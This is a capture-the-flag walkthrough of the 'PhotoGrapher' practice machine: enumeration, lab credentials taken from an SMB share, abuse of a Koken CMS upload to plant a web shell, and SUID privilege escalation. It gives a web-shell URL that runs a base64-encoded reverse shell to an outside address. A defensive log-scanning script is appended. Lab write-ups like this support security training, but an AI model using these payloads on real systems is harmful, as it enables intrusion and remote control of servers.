Target machine practice: PhotoGrapher

Posted by cha0s32 on 2024-04-12

Port scan

Port vulnerabilities

Port 80 information gathering:

Two pieces of account information:

v1n1v131r4

templated

Directory scan with dirsearch

/assets

/*main.js*/
/*
	Hielo by TEMPLATED
	templated.co @templatedco
	Released for free under the Creative Commons Attribution 3.0 license (templated.co/license)
*/

Add a domain name resolution entry

172.16.33.88 templated.co

Port 8000 information gathering:

The site is built with Koken, version 0.22.24

/admin is the login page; it requires an email address and a password

SMB service information gathering

Retrieve the shared files

Retrieve the shared folder

Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <agi@photographer.com>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <daisa@photographer.com>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)

Account: daisa@photographer.com

Password: babygirl

Successfully logged in to the service on port 8000

Gaining access

The site is built with Koken

Check whether a known vulnerability exists

The txt file describes how to abuse Koken to upload a web shell

Visit:

172.16.33.88:8000/storage/originals/48/02/test.php?cmd=echo%20L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjguMC4xNjUvNTU1NSAwPiYx|%20base64%20-d|/bin/bash%20-i

# Base64-encoded
# The encoded content is a classic reverse shell
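
A defender-side check for the request shown above, as an added example that is not part of the original post: it flags access-log lines where a script is requested from the upload directory and the query string carries shell syntax. The combined log format, the constructed sample lines, and the names `classify` and `scan` are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Upload directory as it appears in the URL on this page.
UPLOAD_PREFIX = "/storage/originals/"
# Extensions a PHP-enabled web server commonly executes.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Shell syntax that has no place in a request for an uploaded photo.
SHELL_HINTS = re.compile(r"(\||;|`|\$\(|base64\s+-d|/bin/(ba)?sh)")
# Request and status fields of a combined-format log line (assumed format).
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify(line):
    """Return the list of findings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path)
    findings = []
    if path.startswith(UPLOAD_PREFIX) and SCRIPT_EXT.search(path):
        findings.append("script-in-upload-dir")
        if m.group("status") == "200":
            # The server answered, so the file exists and was handled.
            findings.append("script-served")
        if SHELL_HINTS.search(unquote(parts.query)):
            findings.append("shell-syntax-in-query")
    return findings

def scan(lines):
    """Map 1-based line numbers to findings, skipping clean lines."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify(line))}

# Constructed sample log lines (not taken from the target machine).
SAMPLE = [
    '10.0.0.5 - - [09/Apr/2024:17:05:00 +0000] "GET /storage/originals/48/02/photo.jpg HTTP/1.1" 200 48211',
    '10.0.0.5 - - [09/Apr/2024:17:06:00 +0000] "GET /storage/originals/48/02/test.php?cmd=echo%20QUJD%7C%20base64%20-d HTTP/1.1" 200 12',
    '10.0.0.5 - - [09/Apr/2024:17:07:00 +0000] "GET /admin/ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE).items():
        print(lineno, ", ".join(findings))
```

Any `script-in-upload-dir` hit is worth investigating on its own, since a photo storage directory should only ever serve static files.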

Getting a shell

Privilege escalation

The executables above have the SUID permission set

Privilege escalation succeeded
